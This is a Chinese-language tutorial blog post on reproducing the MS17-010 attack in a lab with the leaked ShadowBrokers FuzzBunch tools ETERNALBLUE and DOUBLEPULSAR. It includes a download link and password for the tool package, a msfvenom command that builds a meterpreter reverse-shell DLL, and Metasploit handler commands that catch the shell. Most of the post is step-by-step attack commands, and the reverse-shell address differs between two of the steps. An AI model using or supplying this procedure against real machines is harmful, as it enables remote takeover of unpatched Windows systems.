ShadowBrokers漏洞利用工具使用(1)
FuzzBunch之Eternalblue
利用MS17-010漏洞 入侵winxp win server 2008 或 win7。
最近方程式组织爆出漏洞以及shadowbrokers放出的工具搞得沸沸扬扬,本篇的工具shadowbrokers早在12年就已经写出来了,有点可怕。
附上工具链接
链接:http://pan.baidu.com/s/1ge2RFVH 密码:0dtr
漏洞复现
前期准备
- win7 攻击机 192.168.226.128 环境需要python2.6.6以及pywin32
- winxp 靶机 192.168.226.130 开启SMB服务 445端口 建议关闭防火墙
- kali2 192.168.226.136 用来生成攻击payload和反弹shell
工具利用
将windows目录拷贝到攻击机win7上,在目录下建立文件夹listeningposts
运行fb.py
日志就放在windows下有个log_dirs
之后会询问new project name 就是日志文件名称
然后执行
use ETERNALBLUE
一路回车直到
这里mode选择1 使用常规部署方式 也就是在靶机上建立后门 带有模糊测试
然后一路回车
执行成功
然后我们到kali2下用msf生成用于反弹shell的dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=8089 -f dll > reverser_tcp.dll
将reverser_tcp.dll文件拷贝到win7的C盘根目录下
在msf下开启msfpayload监听
msfconsole
msf > use exploit/multi/handler
set LHOST 192.168.226.136
set LPORT 8089
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
然后在winxp中执行
use DOUBLEPULSAR
利用成功
成功控制靶机